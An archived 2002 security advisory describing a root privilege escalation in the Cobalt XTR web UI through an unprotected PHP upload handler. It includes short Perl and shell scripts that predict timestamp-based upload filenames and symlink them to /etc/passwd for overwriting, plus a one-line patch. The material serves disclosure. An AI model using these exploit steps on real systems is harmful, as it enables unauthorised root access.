TUCoPS :: SunOS/Solaris :: napl5175.htm

Cobalt XTR local access priviledge escalation via unprotected php form
9th Mar 2002 [SBWID-5175]
COMMAND

	Cobalt XTR local access priviledge escalation via unprotected php form

SYSTEMS AFFECTED

	Cobalt XTR ??

PROBLEM

	A   \'Wouter   ter   Maat   aka\'    [grazer@digit-labs.org]    advisory
	[http://www.digit-labs.org] & [http://www.i-security.nl] :
	

	Some areas of the Cobalt XTR UI are not .htaccess  protected,  Therefore
	users     can     access      MultiFileUpload.php      from      remote.
	MultiFileUploadHandler.php   handles   upload   request   posted    from
	MultiFileUpload.php.  Due  to  an  authentication  bug  in  the   upload
	Handler, users can write files to the filesystem as any  valid  user  on
	the system, including root. To  exploit  this  vulnerability,  you  need
	shell access (or be creative).
	

	----- snippet of MultiFileUPload.php ----- 

	// get uid 

	$pwnam = posix_getpwnam($PHP_AUTH_USER); 

	$uid = $pwnam[\"uid\"]; 

	// get filename 

	$baseName = base64_encode(time()); 

	$fullName = \"/tmp/\" . $baseName; 

	------------------------------------------ 

	

	As you can see, user information is read to $pwnam, which is the  return
	value of function posix_getpwnam($PHP_AUTH_USER); PHP_AUTH_USER  can  be
	modified to each desired value (remote) (i prefer root :P).
	

	The Next problem, lies in the base64 encoding of the filename, which  is
	predictable. If you can predict the base64  filenames  for  example  the
	next ten minutes (time()), and create  symbolic  links  to  /etc/passwd,
	you will have exactly ten minutes to exploit the machine.
	

	After the symlinks have been created (script to  create  base64  symlink
	is below), you will need to upload your  modified  target  file  (script
	set to /etc/passwd). You can upload your file at :
	

	https://<cobalt_xtr_host>:81/uifc/MultFileUploadHandler.php

	

	

	

	---------------- local-timerace-xtr.pl ----------------- 

	#!/usr/bin/perl 

	# mass base64 time encoder 

	# part of Cobalt UIFC XTR remote/local combination attack 

	

	

	use MIME::Base64; 

	$evil_time = time(); 

	

	$exploit_secs = 10; # time in seconds you got to exploit this bug (race) 

	

	for($i=1;$i<=$exploit_secs; $i++) { 

	$evil_time = $evil_time+1; 

	$evilstr = encode_base64($evil_time); 

	print $evilstr; 

	} 

	------------------------------------------------------- 

	

	------------------- symlink-time.sh ------------------- 

	#!/bin/sh 

	#Script for creating symlinks from output of local-timerace-xtr 

	

	for foo in `perl -x xtr-timerace-xtr.pl` 

	do 

	ln -s /etc/passwd $foo 

	done 

	------------------------------------------------------- 

	

SOLUTION

	Quick patch : Create a .htaccess file in the uifc directory.

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2025 AOH